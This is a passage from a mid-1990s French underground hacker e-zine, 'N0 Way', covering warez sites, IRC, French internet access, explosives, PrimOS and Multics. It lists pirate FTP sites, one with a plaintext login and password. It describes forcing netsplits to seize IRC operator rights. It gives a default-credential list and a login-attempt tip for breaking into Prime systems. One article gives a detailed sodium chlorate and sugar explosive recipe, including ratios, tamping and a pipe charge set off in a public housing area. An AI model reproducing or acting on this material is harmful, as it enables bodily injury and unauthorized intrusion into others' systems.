- Un petit programe fait cela entre autre dans les sessions Talk, c'est flash2.c
- et son ancetre qui ne le fait pas mais est sympa: flash.c.
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.13
-
-
- ^^^^^^^^^^^^^^^^^^^^^^^^^
- >>>>>>>> du cote <<<<<<<<
- ======= d'internet ======
- vvvvvvvvvvvvvvvvvvvvvvvvv
-
- Chez les internetiens, ca a bougé sacrement, apres les emmerde de Philip
- Zimmerman accusé par la NSA et la CIA d'avoir exporté un logiciel de
- cryptographie (PGP) les hackers se sont mis a remuer sec.
- Le probleme de PGP a été résolu, la version 2.5 est interdite à l'export
- mais la 2.6 est okay et exportable !
- STICK WITH 2.5, IT'S THE MOST SECURE!
-
- Les experts en sécurité d'une grosse agence francaise ont déclaré recemment:
- "On leur a bien fait la nique"...
-
- J'ai bien peur que la plus grosse "nique" ce soit nous qui la faisions
- prochainnement. En effet, beaucoup de jeunes hackers se sont lancés a fond
- dans le hack professionel.
-
- Grace à des listes de diffusions comme 8lgm et bugtraq, ils ont acqui un
- savoir faire impressionant. A suivre...
-
- | Underground sites |
-
- Sur Internet, il y a des serveurs FTP ou FSP qui hébergent sans le
- savoir des sanctuaires du hacking ou de la scene 0-day warez.
- Voici une petite liste qui a été récuperée aux USA:
- ============
- ----++++ Betaz List ++++----
- -= These sites are up 9.05.94 =-
- ------------------------------------------------------------------------------
- FTP
- ~~~
- sy2000.cet.fsu.edu /incoming/msdos/.<tab>/.^l^k pc|mac|fast
- cs.uidaho.edu /pub/incoming/MacPGP/"<tab><tab>" pc|mac
- 130.246.23.9 /pub/others/".. "/".. " pc|mac
- 130.246.17.54 /pub/".. "/".cache " " "
- brinta.ptf.hro.nl ** Private **
- 160.78.31.26 /incoming/".. " pc
- ic16.ee.umanitoba.ca /pub/PSCAD_RTDS/incoming/te few
- acme.fred.org /pub/msdos/Tmp/^X few
-
- Console
- ~~~~~~~
- syr.edu /software/unix/kip/dpf snes|sega
- 131.215.46.20 1717 snesapalooza
-
- To add to or recieve an updated list
- mail an112452 or msg betaz on irc
- ============
- Voila, donc vous pouvez aller y faire des tours, c'est pas mal.
- Ce sont des warez en general de bonne qualité.
-
- Et voila une autre liste:
- ============
- FDISK and FERN's Warez List 9:09PM 8/24/94 Atlantic FDISK V5.6
- All of the sites have been test as of the date and time above
-
- FTP
- Site Dir Submitted By
- --------------------------------------------------------------------
- corto.inria.fr /broadcast/^K^E^F^E^L Skippy
- tiger.vut.edu.au login:r9202044 Pass:Daavee ".. "
- 192.54.41.33 /pub/avs_mirror/pub/siggraph/uploads/"..." cc
- acme.fred.org /pub/msdos/tmp/".. " swazi
- 130.246.23.9 /pub/others Hi-Fi
-
- Site Port Submitted By
- --------------------------------------------------------------------
- 130.161.39.3 5300 Wowzer
- 128.206.29.11 12321 Bryer
- 158.132.79.228 1997 casey(anon 10285)
- ============
-
- | IRC |
-
- Vous connaissez IRC? L'Internet Relay Chat... C'est le havre dans
- lequel tous les internet junkies viennent discuter de n'importe quoi.
-
- Un des "channel" les plus virulent est #hack (suivi de pres par #warez et
- #phreak). La dedans se livre une petite guerre permanente à qui aura les
- droits operateurs sur le channel, pour cela, nous avons recours à des outils
- assez rigolos. Tout d'abord, chaque bon hacker qui se respecte a sa propre
- armure personnelle le protegeant des divers Tsunamis ou Rolling Bombs qui ne
- sont que des attaques software destinées à virer quelqu'un du channel.
- Les plus connus de ces logiciels sont GargOyle et Serpent de Vassago, personnage
- tres controversé sur Internet.
- (gargoyle.tar.Z, serpent.tar.Z, ircdfens.tar.Z, util662.tar.Z, textbox.tar.Z)
- Ensuite vient le hack hard qui passe souvent par l'arret de serveur IRC
- isolant un connecte de l'ensemble des autres connecte et qui donne ainsi les
- chanops (channel operators) au connecte isole.
- Fun isn't it?
-
- La pluspart du temps vous ne trouverez personne d'interessant au premier abord
- sur #hack. Mais de nombreuses personnes interressantes y passent souvent.
- Donc la premiere impression de conneries inutiles n'est pas forcemment vraie
- pour tout le monde.
-
- Comment se connecter sur IRC?
- - - - - - - - - - - - - - - -
- Eh bien tout d'abord il vous faut un client IRC que vous compilerez
- pour votre unix (si vous avez un PC sous SLIP et PPP, il vous faudra chercher
- un client IRC pour PC). Ensuite, vous devrez trouver un serveur IRC qui
- marche dans votre coins (pas trop loin dans le reseau) et qui vous accepte en
- tant que connecte. Si vous prenez un serveur irc trop loin (comptez la
- "distance" avec traceroute), vous aurez des delais dans votre dialogue.
- Il vous faut aussi et bien sur un acces Internet.
- Une fois que vous aurez fixé tout cela, vous pourrez vous connecter sur IRC.
-
- Comment utiliser?
- - - - - - - - - -
- Les commandes IRC sont assez simple. Je vous conseille de prendre un
- client IRC II car ils permettent vraiment des choses tres cool. Ils vous
- permettent par exemple de faire du transfert de fichier avec quelqu'un en
- restant connecte sur le chat et en continuant de discuter.
- On change son nickname (pseudo) avec: /NICK <nouveau nickname>
- On va dans un channel en faisant: /join #<nom du channel>
- Les noms de channels commencent toujours par #
- On quitte un channel en faisait: /leave <channel>
- On sort du client en faisant: /exit
- On envoie un message prive non securise à quelqu'un: /msg <nickname> <message>
- On regarde qui il y a dans le channel avec: /who #<channel>
- voila les commandes de base.
-
- Explication du fonctionnement du reseau IRC.
- - - - - - - - - - - - - - - - - - - - - - -
- On utilise l'IRC avec un client qui se connecte à un serveur IRC.
- Ce serveur IRC est connecte à d'autres serveurs IRC. Ainsi, il y a un traffic
- moins important car l'information est distribuee sur les serveurs IRC. Si
- chacun choisit un serveur IRC proche de chez lui (pas beaucoup de internet hop,
- les saut de puces que l'on voit avec traceroute), les liaisons internationales
- ne seront utilisées que par les serveurs et donc pas de gaspillage!
-
- Ainsi on aura:
- Client Client Client
- Client__ | `\ |
- `\ | `\ |
- `\ | `\ |
- Client----IrcServ3==========IrcServ4=====IrcServ5-----Client
- || \
- || \
- || \
- Client----IrcServ2==========IrcServ1 Client
- | |
- | |
- Client Client
-
- Si il y une coupure reseau entre IrcServ1 et IrcServ2 le user connecte sur
- IrcServ1 n'aura plus qu'a quitter et revenir dans le channel en question et
- des a present il aura les chanops sur le reseau car IrcServ1 croit alors qu'il
- est tout seul dans le reseau puisqu'il ne voit pas les autres au dela de la
- coupure reseau (que l'on appelle netsplit).
- Ainsi, des que la connection entre IrcServ 1 et 2 reviendra, le Client de
- IrcServ 1 sera chanop et le restera : il sera devenu chanops.
- Donc le jeu est pour certain de devenir chanop et de faire "tomber" la liaison
- entre son serveur local et le serveur qui fournit le feed IRC a son serveur
- local. Je sais, c'est vicieux mais a la fin ca n'a plus d'interet tant c'est
- commun sur Irc.
-
- Au niveau des chanops, il faut savoir que le premier qui se connecte
- dans un channel deviens automatiquement le maitre du channel avec ses chanops.
- Il peut ainsi:
- - ejecter quelqu'un du channel (/kick <nickname>)
- - modifier le sujet (topic) du channel (/topic #<channel> <new topic>)
- - rendre operateur quelqu'un d'autre (/mode +o <nickname>)
- - enlever l'operateur à quelqu'un (/mode -o <nickname>)
- - modifier les droits d'acces au channel (on peut banir du channel certainnes
- personnes, certainnes adresses etc...)
-
- Quelques conseils:
- - - - - - - - - -
- Ne tapez pas tout ce que l'on vous dit de taper et surtout ne tapez
- pas des trucs du style /ON ou /EXEC car si vous etes sous Unix, cela vous fera
- executer des choses qui peuvent être des backdoor pour revenir sur votre suite
- ensuite.
- Evitez de faire chier les personnes avec un @ devant leur nom, ce sont
- les chanops!
- Avant d'utiliser un script Irc II que l'on vous envoie, verifiez bien
- qu'il ne contient pas de backdoor!
-
- Voila !
- - - - -
- Vous voila prêt pour aborder l'IRC sans difficulté! Attention, on
- devient vite accro a ce service de l'internet.
- Peut etre demanderez vous un jour en vous debranchant de votre NeuroPrise (tm)
- "y a t'il une vie après l'IRC?"
-
- ++NeurAlien.
-
- | Internet for the masses |
-
- La France était (JE DIS BIEN ETAIT) sérieusement dans la merde car
- aucun acces public à l'Internet n'était disponible à des prix abordables.
- Bien sur il y avait des passes droits accordés à certains privilégié qui
- bénéficiaient de l'acces d'un université ou d'un institut pour utiliser
- Internet.
-
- Depuis quelques mois, il semble que tout ait un peu changé.
- Il est apparu d'abord des services minitels proposant mail et news. Bien sur,
- ce genre de service est une vraie arnaque car il ne fournit pas quelque chose
- d'agréable (vous avez deja les news a 1200/75 bauds????). De plus, ils se
- sont avere de qualité assez médiocre. Pour n'en citer que quelques uns, ya
- TEASER et sa floppée de services parallèle destiné à se faire du fric sans se
- préocupper des connectés (Sniifff Sniiff... mais oui, je reconnais cette odeur
- de pourriture... mais c'est... c'est.... c'est J.. et C...) et les services
- EMAIL, INTERNET etc...
-
- Ensuite ya des trucs largement plus serieux qui se sont monté. On a
- tout d'abord entendu parler de boites qui voulaient faire du dialup IP.
- Ma première réaction a été:
- "Et merde, ca y est, encore des arnaqueurs qui viennent squatter une de ces
- derniere place de liberté qu'est l'Internet".
-
- Alors on a vu apparaitre en premier un truc appelé World-Net. Ne
- voulant pas juger à la légère, j'ai demandé des infos et voila:
- 80 F de l'heure pour le Full IP (FTP, Telnet, Mosaic etc...)
- 40 F de l'heure pour le Mail, News et IRC.
- Je me suis dit:
- "arghhh... putain c'est cher"
- Et quelle connerie j'ai dit la, j'avais pas vu ce qui suivait.
- Au mois de Juin et Juillet d'autres boites se sont fait connaitre:
- >FranceNet qui fait passer son service pour de l'internet alors que c'est juste
- un BBS connecté à l'internet qui ne permet pas de faire reellement du Dialup
- IP, bref, c'est vraiment pour le con moyen qui sait pas se servir de son
- clavier. En plus c'est hyper cher (36 68) et ca fonctionne très mal!
- >Calvanet : alors la c'est une arnaque incroyable... meme pas la peine d'en
- parler. C'est la pourriture Calvacom revue et corrigee pour Internet.
- >France Telecom et leur service internet: si vous avez plus de 10 000 F par
- mois a mettre dans une liaison qui n'est meme pas permanent pour ce prix la,
- vous pouvez toujours tenter.
- J'ai rarement vu une boite qui ait le culot de faire cela quand meme! C'est
- une honte !
-
- Bref, dans les 4 fournisseurs World-Net, francenet, calvanet et l'offre FT,
- c'est bien WorldNet qui est le moins cher.
-
- Alors je recapitule les infos que j'ai eu sur eux (worldnet):
- >Pas d'abonnement.
- >Pour le Full IP : 80 F HT / heure
- >Pour le Mail, News et IRC: 40 F / heure
- pas d'autre frais. pas de frais à la mise en place. Ils peuvent fournir un
- package de communication pour PC ou Mac.
-
- Bref... c'est pas les prix fabuleux qu'on pourrais avoir aux US mais c'est
- pas mal quand meme.
-
- Voila, j'espere que ca vous évitera de vous faire pieger. J'ai des potes
- pourtant pas trop naze qui se sont fait pieger par les arnaqueurs de
- Francenet. Ca semble ne rien couter car c'est en 36 68 (2.19F / minute) et
- quand tu recois la facture FT, il est deja trop tard !
-
- Amusez vous bien avec Internet. ++NeurAlien.
-
- P.S: J'ai une information tres tres tres interressante.
- WorldNet fait une "semaine Worldnet" avec Internet gratuit pour n'importe
- qui le demandant. C'est trop cool. Je me rappelle plus de la date mais
- ils ont un service qui informe la dessus, c'est le 3615 Worldnet ou le
- 3617 SCT je crois.
- Je met les coordonnées de téléphone de cette boite:
- Tel: (1) 60 20 85 14
- Hehe... moi c'est sur, je vais demander un compte pour ce truc !
-
- Disclaimer:
- J'en ai rien a foutre si mes propos font chier certainnes des boites
- mentionnées (francenet, WorldNet, Calvanet, France Telecom, teaser
- etc...). Ce que j'ai dit est vrai et si ca vous plait pas vous avez
- qu'a être honnètes vous aussi. Je ne suis pas un politicien donc j'en
- ai rien a cirer de l'avis des pseudo-VIP, je suis pas journaliste et
- ceci n'est pas un journal alors les proces en diffamations vous pouvez
- vous les mettre ou je pense.
- A bon entendeur salut! ++NeurAlien.
-
- | Dialup IP |
-
- Vous entendez parler partout de Dialup IP et vous ne savez pas ce que
- ca veut dire. Cette partie est sensée vous expliker cela!
-
- Dans le temps, avant qu'Internet soit populaire, un vieux système
- appelé UUCP permettait de recevoir son mail et ses news par "à coups" car il
- fallait aller chercher ses informations sur le serveur et consulter en local.
-
- Ensuite on a vu apparaitre pour les privilégié des accès shell sur des
- becannes reliées à l'Internet. A partir de la, on avait un terminal qui
- permettait d'utiliser tous les outils d'Unix pour se connecter sur l'Internet:
- telnet, FTP, IRC, gopher. Mais ca s'est vite trouvé dépassé. Par exemple, le
- World Wide Websted (WWW) qui est un ensemble de serveurs multimédias reliés
- par des liens hypertexte et qui fonctionne en reseau ne peut fonctionner
- qu'avec un terminal ayant des capacite graphiques et sonores. Ce que
- generalement les terminaux n'ont pas!
-
- Bref, il a fallu s'adapter, c'est pour cela que le SLIP puis le PPP
- ont été créé. Au lieu de se connecter avec un émulateur de terminal sur un
- unix et de converser avec un Shell, la politique du SLIP & PPP est de
- transformer le flux de paquet venant de l'Internet en quelque chose que l'on
- peut passer sur le lien série du modem.
-
- Donc PPP et SLIP servent à émuler en fait une liaison TCP/IP
- (protocole Internet) sur une communication modem. Bien sur, cette liaison
- n'est pas permanente.
-
- Ainsi, on considère la machine de l'utilisateur comme un noeud
- temporaire d'un reseau connecté à Internet. Cette machine (qui peut être la
- votre) possède donc sa propre adresse. Il faut pour gerer ce flux de paquet
- qui transite à travers le modem un "Client" PPP ou SLIP qui retransforme ca en
- quelque chose d'exploitable par les "Clients" IRC, Mosaic (pour le WWW),
- Telnet, FTP, Gopher, Mail, News.
- (Le terme client désigne un programme qui va traiter l'information dispensée
- par un serveur centralisé).
-
- Avec PPP et SLIP vous pouvez envoyer vos propre paquet. C'est un peu
- comme la victoire du combat qui se déroule sur le cable TV.
- Les grosses compagnies veulent un système peu interactif qui permettra
- seulement d'acheter avec son numéro de CB des programmes à la télé.
- Les cyberpunks veulent un truc totalement interactif qui permet de proposer
- soi même ses propres service. SLIP et PPP vous permettent de proposer vos
- propres services à l'ensemble du monde. Bien sur ces services sont
- accessibles uniquement quand vous etes connecté.
-
- Exemple pratique: emulation SLIP sous Windows.
- Vous avez un PC.
- Vous avez un modem 9600 minimum (19200 ou 28800 c'est le reve!).
- Vous avez les logiciels Trumpet et WinSock.
- Vous avez les clients Mail (Eudora), News, Mosaic, FTP etc...
-
- Trumpet est le logiciel qui vous permet de vous connecter à un service vous
- fournissant du SLIP.
- WinSock permet d'émuler les sockets ("systeme de communication d'Internet"
- (c'est pas exactement ca)) sous Windows.
- Les clients exploitent les infos transmises par Trumpet puis WinSock.
-
- schéma:
-
- ____________________________________________
- | Client | Client | Client | Client | Client |
- | Mail | FTP | Mosaic | News | Irc |
- |(eudora)| | | | |
- |--------+--------+--------+--------+--------|
- | |
- | WinSock |
- | ( transforme les infos fournie par Trumpet |
- | en sockets exploitable par les clients ) |
- |--------------------------------------------|
- | |
- | Trumpett |
- | ( assure la cnx SLIP et la reception des |
- | paquets TCP/IP ) |
- |--------------------------------------------|
- | |
- | couche Hard |
- | communication modem en série |
- | |
- --------------------------------------------
-
- L'avantage avec ce système est que l'on peut utiliser plusieurs
- clients en même temps: FTP, News et Mosaic par exemple.
-
- C'est TRES TRES pratique.
-
- Eh bien c'est sur ces mots que je referme la section "du coté d'internet".
-
- ++NeurAlien
-
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.14
-
-
- [ Petite précision sur les explosifs:
- Ce que je vais dire, tout le monde le sais: Les explosifs sont TRES dangereux.
- Mais bon, on se dit: ouais, je vais assurer etc... mais ca c'est du N'IMPORTE
- QUOI ! On ne maitrise jamais totalement ce genre de produit (même les
- artificiers professionels).
- Un explosif amateur a un probleme: il n'est presque jamais stable, par contre
- il est en général aussi fort que les explosifs professionels. Donc, il faut que
- vous sachiez que chaque année il y a entre 10 et 100 gosse qui garderont a vie
- des sequels de ce genre de connerie. (j'ai un ami qui doit tout le temps porter
- des gants car sinon c'est vraiment pas beau!).
- DECONNEZ PAS, faites vos mélanges en petite quantité et n'oubliez pas:
- ce genre de mélange peut être MORTEL ! ++NeurAlien.]
- -----------
-
- L'explosif ? tient tient...
-
-
- Ce jour la j'etais sceptique, on m'avait dit qu'un simple melange de sucre et de
- desherbant (chlorate de soude) suffisait a faire de l'explosif. Au fait, sur les
- paquet de petards, vous n' avez vous jamais lu 'Ne contient ni chlorate, ni
- perchlorate' ? La tentation fut forte, et j'achetais le jour suivant les
- ingredients...
-
- Premiere preparation, quelques grammes, moitier sucre, moitier chlorate.
- J'allume. Stupefaction, ca brulait tres vivement, une flamme jaune extremement
- lumineuse, pendant quelques secondes, en meme temps ca degageait une fumee
- blanche tres epaisse avec une odeur de caramel. (la decomposition spectrale est
- en fait celle du sodium, 2 raies jaunes). Le melange a l'etat brute ne fait que
- bruler a l'air libre. On dit que le compose fuse.
-
- Pour l'utiliser en explosif il fallait donc enfermer le melange dans un tube.
- J'avais confectionne un tube ouvert d'un cote, et que l'on pouvait ferme de
- l'autre. J' y mettais dedans les celebres Mammouths. Du cote ouvert on pouvait
- placer un projectile qui entrait dans le tube. Lorsque le petard claquait le
- projectile ( ecrou + boulon qui bouchait bien l'entree ) etait expulse avec une
- force suffisante pour percer une plaque de fer de 1/2 mm d'epaisseur. Bien sur
- il me fallut peu de temps pour remplacer les Mammouths par le melange. J'avais
- tasse au fond du tube une epaisseur de peut etre 5mm. Un trou dans le fond du
- tube laissait passer une meche de petard, ce qui declancherais l'explosion
- J'essaie. La detonnation fut sourde et grave, on sentait l'onde de choc. Le
- fond du tube etait finalement eventre, decapite et plie en arcordeon rien qu'
- avec la force du recule du tube lorsqu'il cogna dans un mur. Surpennant, avec si
- peu de poudre...
-
- Afin de perfectionner l'explosif, je fit quelques recherches. Meme le prof de
- physique s'y etait mis ! Un sacre lascar du Cnrs d'ailleurs.
-
- En voici les resultats:
-
- Les meilleurs performances sont obtenues en melangeant 2/3 de sucre glace et
- 1/3 de chlorate en poids. Pour afiner les rapports il suffit de regarder ce qui
- reste apres que l'on est fait fuser le melange: Reste du rose coulant -> un peu
- trop de chlorate. Reste noir bousoufle -> trop de sucre. Ce melange augemente
- ces performances lorsqu'il est humide au toucher. Il ne doit surtout pas etre
- coulant. Il ne craint donc absolument pas l'humidite, au contraire. Le fin du
- fin c'est de combiner de l'huile de vaseline. (Quasiment tous les explosifs pro
- contiennent de l'huile de vaseline, mais cette operation est delicate a
- realiser). Plus le melange est tasse plus ca pete fort. Ceci est en fait tres
- important. Apres l'avoir tasse, ca doit etre un bloque dur. Pour le faire,
- n'utilisez pas d'etau, de pinces etc..!!!! Ca vous peterait a la gueule, avant
- meme d'avoir dit 'ouf..'
-
- Il est important de remarquer que le melange fuse a partir de 50 degre C ! Le
- melange est tellement instable, qu'il n'y a pas besoin de flamme pour que ca
- demarre. Ceci explique aussi pourquoi il est sensible aux chocs (le choc
- provoque un petit echauffement en un point, meme tres faible), donc attention
- !!! pas de brutalite. Enfin le melange devient de plus en plus instable au cours
- du temps s'il est tasse. Apres 24h, ca devient dangereux et risque de bruler (ou
- peter) tout seul. On utilise au fur et a mesure qu'on fabrique. Une solution
- pour en garder consiste a humudifier le melange, et le stocker dans un
- congelateur a -18 deg. Mais mieux vaut l'eviter si on peut.
-
- Apres la parfaite maitrise, je confectionnais un gros petard, avec 100 grammes
- de melange tasse dans un bout de cadre de velo decoupe et ferme au bout a la
- presse prealablement percer pour laisser passer une meche. -----> Ne percer pas
- apres avoir mis le melange et fo prendre la precaution de mettre du papier
- mouchoir ou Wc au bout du tube, afin d'etre sur que l'on ne presse pas le
- melange !!!!!!!! Operation termine, je vais a la ZUP, ou les petards n'inquiete
- depuis longtemps plus personne et ou la police ne vient pas. Je le pose sur une
- plaque en beton des telecoms. J'allume la meche et je me retire mine de rien. De
- toute ma vie je n'ai jamais entendu une telle detonnation ! Ce n'est pas
- comparable, si bien qu'il m'ai tres difficile de la decrire. A entendre le bruit
- j'ai pense que les plaques de beton de largement plus de 100kg et de 10cm
- d'epaisseur etait integralement pulverisees. C'est une detonnation qui ne fait
- pas mal aux oreilles. C'est un bruit tres puissant, tres sourd et tres grave,
- un peu comme un coup de tonner ne fait pas mal aux oreilles. C'etait encore plus
- grave, et certainement 10 fois plus forts ! Je crois qu'on arrive pas a se le
- representer. Mais surtout ne vous bouche pas les oreilles ! Apres la detonnation
- une grande fumee blanche se dissipa. Imaginer la tete des gens, on pense a un
- attentat. D'ailleurs dans la minute qui suivit la detonnation personne n'a
- ouvert la fenetre. L'onde de choc n'a heuresement pas brisee de vitres.
-
-
- C'est ensuite seulement qu'on se dit, j'ai pris ca dans les mains, je l'ai
- transporte dans un sac en plastique (jamais ds les poches), mais j'ai ete dingue
- Vraiment si on s'imaginait la force que ca peut avoir, personne n'aurait le
- courage d'en faire, et de loin ! On c'est bien marre, on a fait du 0 erreur, on
- a eu beaucoup de chance, tout simplement. Se ne sont pas des choses qu'il faut
- refaire a tour de bras. Faut etre raisonnable et lucide, a vous de voir.
-
-
- A bon entendeur, salut !...
- By Inlandsis.
-
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.15
-
-
- Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
- diffuse publiquement.
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- = CORE-DUMP Issue 1 Phile 3 [NeurAlien] 13/01/92 =
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
- /@@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@\
- @/ \@
- @ Prime & the PrimOS Environment @
- @ @
- @ par @
- @ @
- @ NeurAlien @
- @\ /@
- \@@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@/
-
-
- Le Prime est un ordinateur a mi-chemin entre le gros ordinateur de
- traitement lourd et l'ordinateur de gestion de conception plus legere.
- Son systeme d'exploitation s'appelle le PrimOS et est un systeme proprietaire.
- Il est multi-utilisateur et possede plusieurs modules des l'origine:
- un module Basic, un autre de programmation pseudo-shell (batch) etc...
- Le prime possede de nombreuses failles de securite. Notemment dans le
- programme tour.
-
- >L'acces au Prime:
- =================
- L'acces au Prime se fait par une base d'acces d'où l'on peut lancer des
- commandes de pre-login appelee PrimeNet. C'est en fait comme un service
- d'accueil et de dispatching avec une machine par defaut.
- Les prompts utilisé par le système de prélogin sont 'OK' et 'ER!'.
- 'OK' est affiché en premier, si vous tapez quelque chose d'incorrect, le Prime
- vous répondra par un 'ER!'.
- La bannière ressemble a :
- "Primenet V2.3"
- Un message souvent vu sur Prime est:
- Please Login
- ER!
-
- Cela veut dire que vous vous etes plante dans la commande et qu'il faut taper
- login:
-
- Primenet V 2.3 (system)
- LOGIN<CR> (vous)
- User id? (system)
- AA1234 (vous)
- Password? (system)
- KILLME (vous)
- OK, (system)
-
- La principale commande etant bien sûr login.
- syntaxe: login [<user>] [<password>] [-ON <host>] [-PROJECT <project_id>]
- Le nom user est ecrit en majuscule comme la pluspart des commandes en PrimOS
- d'ailleur. Une fonction interressante de PrimeNet est de pouvoir se logger
- sur une machine autre que celle par defaut sans pour autant avoir a se logger
- sur la machine par defaut.
-
- Il vaut mieux essayer plusieurs logins par la commande
- login <user> <password>
- comme ca vous avez 3 essais au lieu d'un essai.
-
- >Le systeme d'exploitation du Prime, PrimOS:
- ===========================================
- La version actuelle de PrimOS doit etre la 22 ou la 23.
-
- >Les commandes d'utilisation courante du systeme:
- ================================================
- status users \_ : Affiche la liste des users, leur origine, leur etat
- us /
- all \_ : Affiche des infos sur toutes les activites du
- al / systeme
- comm : decrit les controlleurs de communication et leurs
- etats respectifs.
- devices : donne des informations sur les peripheriques
- disks \_ : donne des informations sur les disques
- di /
- me : donne des infos sur soi meme.
- network \_ : donne des infos sur les differents noeuds du reseau
- net / PrimeNet.
- project \_ : donne des infos sur les projets sur users
- pro /
- system \_ : donne des infos sur le PrimOS en train de tourner.
- sys /
- semaphores \_ : donnes des infos sur les semaphores actives
- se /
- units \_ : donne des infos sur les units ouverts
- un /
-
- listf \_ : donne le nom du dir, le peripherique et si on a des
- l / ACLs dessus ou non.
-
- slist <pathname> : affiche le fichier a l'ecran
-
- login [<user>] [<password>] [-ON <host>] [-PROJET <projet_id>]
- : ouvre un log sur la machine specifiee ou definie par
- defaut avec le password et le projet specifie ou par
- defaut.
-
- date : affiche la date et l'heure
-
- time : affiche les valeurs du registre de temps partage:
- . connect time : temps depuis le login
- . compute time : temps d'utilisation de
- programmes
- . I/O : temps d'utilisation d'un
- Disk, Controlleur de comm ou
- Device.
-
-
- >Les communications:
- ===================
- Les communications x25 se font par l'intermediaire de netlink qui est un
- programme de communication.
- on l'appelle comme suit:
- netlink<cr>
- Ce programme est en fait un sous systeme. Il vous reponds alors le prompt '>'.
- Ici vous pouvez tapper diverses commandes:
- c <DNIC>:<NUA> : appelle en collective call le NUA
- nc <DNIC>:<NUA> : appelle normalement le NUA
-
- >Les logins par defaut:
- ======================
- User ids: Passwords:
- --------- ----------
- Admin
- Games
- Tools
- Rje
- Netman
- Cmdnco
- Demo
- Regist
- Prirun
- Telenet
- mail mail
- prime prime / primos
- primos_cs prime / primos
- Primos
- primenet primnet
- mfd mfd
- fam fam / Ver. 18 Primos \
- system system < et en dessous >
- dos dos \ --------- /
- tele tele
- netlink netlink
- test test
- guest guest
- guest1 guest1/guest
-
- >le mot de la fin:
- =================
- Ya pas mal de système Prime qui sont encore TRES ouverts à tout type de
- pénétrations (hahaha). Alors pour les bons petits PADs tranquile, c'est kewl!
- NeurAlien.
- ------------------
- S0, G0 0N wif N0 Way !
-
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.16
-
-
- <<</\[..]/\[..]/\[..]/\[..]/\[..]/\>>>
- </' `\>
- <\ Rave Revolt />
- <\ \>
- <<</\[..]/\[..]/\[..]/\[..]/\[..]/\>>>
-
- -
- PART I
- -
-
- Arggghhhhhhh!!!!! C'est le cri de la bete qui se reveille!
-
- NON, je n'y crois pas, ce que je redoutais est arrivé: ce havre de repos
- qu'etait le pont de Tolbiac a ete violé. Le sanctuaire a été profané par de
- sales CRS baveux et grognants avides de baston. C'est vraiment le genre de
- trucs qui m'ecoeurent: ils sont venus faire chier gratuitement des ravers
- simplement car c'était pas déclaré. Encore cet enculé de Pasqua qui s'est
- dit: "Hey merde, ils s'amusent bien là bas et ils sont pas emmerdés par les
- flics car ils ne gênent personne".
-
- Solution: hop, on se renseigne avec les RG et autres enculés civils puis on
- leur envoie les CRS.
-
- Bravo pour les méthodes... C'est d'une finesse....
-
- Alors maintenant qu'ils ont fini de faire chier les raves ils commencent a
- déranger les afters: RI-DI-CULES !
-
- Il paraitrait même qu'il est question d'interdire les raves au plan national.
- La va falloir se secouer car les raisonnements précédents ne peuvent plus
- s'appliquer: on pensait que l'interdictions des raves commerciales permettrait
- à l'underground de se developper. Que nenni, ils s'attaquent directement à
- l'underground!
-
- Quelle sera la prochaine étape?
-
- L'interdiction de TNT?
- L'arrestation des organisateurs des raves?
- (ca serait pas un mal pour E+ et d'autres...)
-
- Il va falloir réagir contre toutes ces poussées sécuritaires et anti-
- démocratiques. Nous y contribuons déja en diffusant No Way un peu partout!
-
- -
- PART II
- -
-
- Le Teknival UFO 23 du massif central a lui aussi été gèné par les keufs
- une nouvelle fois.
-
- Au début, tout se passait bien: le Teknival avait été installé dans un
- champ prèté aux organisateurs par un agriculteur du coins.
-
- Tout se passait bien, a des kilometres des habitations. Pourtant, il y
- a eu DES PLAINTES. Les gendarmes venaient à l'entrée du champs presque tous
- les jours pour se renseigner auprès des organisateurs. Le maire voulait virer
- le teknival de sa commune. Le maire biensur n'y est pas arrivé. Ils ont donc
- transmis l'affaire au prefet etc... Bref, comment faire chier pour rien les
- ravers qui ne génaient personne.
-
- On se balade dans le Teknival, a la recherche de bois pour le feu ou de
- feu pour nos têtes ;) et à chaque fois on entendait:
- "Il parait qu'ils vont envoyer les CRS".
-
- De charge de CRS, il n'y en a pas eu (a ma connaissance), par contre
- ces personnes mal avisées se sotn permise de filtrer à la fin du Teknival
- l'entrée au champ, ne laissant pas entrer les gens mais les laissant sortir.
- Le champs s'est ainsi "vidé" au fur et à mesur des voyages.
-
- La même éternelle question se pose encore,
-
- Mais que veulent ils?
- ++N.
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.17
-
-
- Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
- diffuse publiquement.
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- = CORE-DUMP Issue 1 Phile 5 [NeurAlien] 14/01/92 =
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-
- $£$£$£$£$£$£$£$£$£$£$£$£$£$£$£$
- $$ $$
- $$ Multics par NeurAlien $$
- $$ $$
- $£$£$£$£$£$£$£$£$£$£$£$£$£$£$£$
-
-
- Multics est encore un de ces OS depasses, vieux, obsoletes mais encore
- vivant sur quelques coins retires, hameaux eloignes et ruraux de la
- technopolis galopante que sont actuellement nos grands centre informatiques.
- Les derniers Multics dont j'ai eu connaissance etaient a l'Universite de
- Calgary au Canada, l'INRIA de Rocquencourt en France, Le CIRIL en France qui
- a ete remplace lors de l'ete 1991 par un HP9000 et le CICT toujours en France.
- (et puis aussi: Le ministere de la Culture et l'INRA.)
- Multics est la source d'Unix. C'est un peu comme le pere d'Unix.
- C'est un systeme tres lourds a gerer mais d'un efficacite, d'une fiabilite,
- d'une organisation et d'une praticite telle que l'on se demande pourquoi
- cet OS disparait. En effet, cet OS est certainnement un des meilleurs OS
- developpe jusqu'a maintenant. La derniere version de Multics dont j'ai ete
- temoins est la 12.0 je crois.
-
